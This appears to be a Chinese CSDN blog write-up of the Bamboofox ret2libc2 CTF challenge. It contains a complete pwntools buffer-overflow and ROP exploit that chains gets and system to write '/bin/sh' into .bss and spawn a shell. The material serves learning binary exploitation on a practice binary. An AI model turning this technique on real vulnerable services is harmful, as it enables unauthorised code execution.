Bamboofox ret2libc2解题过程

文章讲述了如何通过分析ret2libc2漏洞,利用pwn库在给定环境下构造payload,将返回地址改写并注入/bin/sh命令,实现远程代码执行的过程。作者强调了寻找可写内存空间的重要性,以填充数据并引导程序执行shell代码。
摘要由CSDN通过智能技术生成

分析

本题分析同Bamboofox ret2libc1一样,不过这里没有给出"/bin/sh"地址,所以这里需要我们自己往system()里面写入"/bin/sh"

解题

这题偏移量和ret2libc1一样,还是112
system地址和gets地址都可在IDA中找到
最终exploit.py如下

from pwn import *

context(arch = 'i386')

p = process('./ret2libc2')

gets_addr = 0x8048460

pop_ebx_ret = 0x0804843d

system_addr = 0x8048490

buf2_addr = 0x804A080 

payload = flat(['a' * 112,gets_addr,pop_ebx_ret,buf2_addr,system_addr,'a' * 4,buf2_addr])

p.sendline(payload)
p.send('/bin/sh\x00')

p.interactive()

exp思路:先填充垃圾数据,把返回地址填为gets的地址,再次输入,把参数改为buf2(.bss)的地址,接着把返回地址改为system的地址,参数为"/bin/sh"

小结

对于这类需要自己填参数的题,可以先找找有没有rwxp权限的内存空间,有的话先填充垃圾数据把返回地址改为输入函数的地址,然后参数改为shell所在空间

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值